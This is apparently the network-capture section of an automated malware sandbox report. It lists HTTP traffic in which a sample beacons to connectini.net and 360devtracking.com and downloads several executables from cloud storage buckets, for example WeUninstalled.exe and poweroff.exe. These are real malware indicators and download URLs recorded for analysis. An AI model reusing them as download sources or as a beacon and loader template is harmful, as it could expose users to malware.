Network Analysis

POST /Series/SuperNitouDisc.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 51 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /WeUninstalled.exe HTTP/1.1 Host: wewewe.s3.eu-central-1.amazonaws.com Connection: Keep-Alive

GET /WeUninstalled.exe HTTP/1.1 Host: wewewe.s3.eu-central-1.amazonaws.com

GET /hadhi_3icha/pub-nv5fyed7t8r9ykva.exe HTTP/1.1 Host: droplex.s3.pl-waw.scw.cloud Connection: Keep-Alive

HTTP/1.1 200 OK content-length: 599040 x-amz-id-2: txdb1368a8a8e74629b9c1a-006391408b accept-ranges: bytes last-modified: Mon, 28 Nov 2022 14:08:08 GMT etag: "2fd508f75431de5565c4972b2586c582" x-amz-request-id: txdb1368a8a8e74629b9c1a-006391408b x-amz-version-id: 1669644488176436 content-type: application/x-msdownload date: Thu, 08 Dec 2022 01:40:28 GMT

GET /hadhi_3icha/up-da-nv5fyed7t8r9ykva.exe HTTP/1.1 Host: droplex.s3.pl-waw.scw.cloud Connection: Keep-Alive

HTTP/1.1 200 OK content-length: 370176 x-amz-id-2: tx7e442cec94ac4984815ac-006391408b accept-ranges: bytes last-modified: Mon, 28 Nov 2022 14:08:11 GMT etag: "524ac8e72b5fe522e85d3df2060edf95" x-amz-request-id: tx7e442cec94ac4984815ac-006391408b x-amz-version-id: 1669644491259310 content-type: application/x-msdownload date: Thu, 08 Dec 2022 01:40:28 GMT

GET /WeUninstalled.exe HTTP/1.1 Host: wewewe.s3.eu-central-1.amazonaws.com

GET /hadhi_3icha/hand-h6vuy332pnrr8zq9.exe HTTP/1.1 Host: droplex.s3.pl-waw.scw.cloud

HTTP/1.1 200 OK content-length: 129024 x-amz-id-2: txb64b679e35c047d9be03c-006391408e accept-ranges: bytes last-modified: Mon, 28 Nov 2022 14:08:14 GMT etag: "70a9b681d28137cfb4f0b4ab59ef51c6" x-amz-request-id: txb64b679e35c047d9be03c-006391408e x-amz-version-id: 1669644494401968 content-type: application/x-msdownload date: Thu, 08 Dec 2022 01:40:30 GMT

GET /S2S/Disc/Disc.php?ezok=pwoffch2&tesla=6 HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Dec 2022 01:40:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

POST /Series/Conumer4Publisher.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Cache-Control: no-store,no-cache Pragma: no-cache Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /Series/publisher/1/KR.json HTTP/1.1 Host: connectini.net Cache-Control: no-store,no-cache Pragma: no-cache

HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Dec 2022 01:41:25 GMT Content-Type: application/json Content-Length: 4184 Last-Modified: Mon, 11 Apr 2022 13:54:12 GMT Connection: keep-alive ETag: "62543304-1058" X-Powered-By: PleskLin Accept-Ranges: bytes

POST /Series/Conumer2kenpachi.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /Series/kenpachi/2/goodchannel/KR.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Dec 2022 01:41:45 GMT Content-Type: application/json Content-Length: 8492 Last-Modified: Thu, 08 Dec 2022 01:15:02 GMT Connection: keep-alive ETag: "63913a96-212c" X-Powered-By: PleskLin Accept-Ranges: bytes

GET /Series/configPoduct/2/goodchannel.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Dec 2022 01:41:46 GMT Content-Type: application/json Content-Length: 344 Connection: keep-alive X-Accel-Version: 0.01 Last-Modified: Mon, 11 Apr 2022 13:48:37 GMT ETag: "158-5dc613383b411" Accept-Ranges: bytes X-Powered-By: PleskLin

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_mp3studioWW HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Dec 2022 01:41:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_file2Ww HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Dec 2022 01:41:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_Trustnero HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Dec 2022 01:41:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_MyFileWW HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Dec 2022 01:41:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_PegasunWW HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Dec 2022 01:41:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

HEAD /mix-carrers/poweroff.exe HTTP/1.1 Accept: */* User-Agent: InnoDownloadPlugin/1.5 Host: 5de5c46f-c6bb-4dc8-bd5f-34662c54ce50.s3.pl-waw.scw.cloud Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK content-length: 304128 x-amz-id-2: txcd9d8669bdb2485c8aa54-0063914070 accept-ranges: bytes last-modified: Mon, 28 Nov 2022 14:01:07 GMT etag: "c34836636624cc3b5a7566743b7a1931" x-amz-request-id: txcd9d8669bdb2485c8aa54-0063914070 x-amz-version-id: 1669644067142161 content-type: application/x-msdownload date: Thu, 08 Dec 2022 01:40:00 GMT

GET /mix-carrers/poweroff.exe HTTP/1.1 Accept: */* User-Agent: InnoDownloadPlugin/1.5 Host: 5de5c46f-c6bb-4dc8-bd5f-34662c54ce50.s3.pl-waw.scw.cloud Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK content-length: 304128 x-amz-id-2: tx317b15a3699d407190d26-0063914070 accept-ranges: bytes last-modified: Mon, 28 Nov 2022 14:01:07 GMT etag: "c34836636624cc3b5a7566743b7a1931" x-amz-request-id: tx317b15a3699d407190d26-0063914070 x-amz-version-id: 1669644067142161 content-type: application/x-msdownload date: Thu, 08 Dec 2022 01:40:00 GMT

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 08 Dec 2022 02:40:27 GMT Date: Thu, 08 Dec 2022 01:40:27 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 08 Dec 2022 02:40:27 GMT Date: Thu, 08 Dec 2022 01:40:27 GMT Connection: keep-alive

POST /ezzcbmueaa4iwhvb/fmovies HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 360devtracking.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue

GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Thu, 08 Dec 2022 01:41:08 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Cross-Origin-Opener-Policy-Report-Only: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2022-12-08-01; expires=Sat, 07-Jan-2023 01:41:08 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=AakniGP1XexIuEK-2pZm5zt3EtysE_7GpFcuTIDzFfy0B01TajphcXQJYQ; expires=Tue, 06-Jun-2023 01:41:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=k8u35EOlWgZe62E7P35skzwcP5UlVcunWUsb_GC8q5oTy0QGB13KYSE1zjaNq78abd12IFkoU1htG5aNbq8M-jmexO4yKI2pmkJrk4MsNfQN_uf7JpDHq4n6uquIAo9gZhmbL7vfhp4G1wODskXbWbFJJ4Pl_6vGiPb9UEGh-H4; expires=Fri, 09-Jun-2023 01:41:08 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 08 Dec 2022 02:41:35 GMT Date: Thu, 08 Dec 2022 01:41:35 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 08 Dec 2022 02:41:35 GMT Date: Thu, 08 Dec 2022 01:41:35 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 08 Dec 2022 02:41:35 GMT Date: Thu, 08 Dec 2022 01:41:35 GMT Connection: keep-alive

POST /ezzcbmueaa4iwhvb/fmovies HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 360devtracking.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue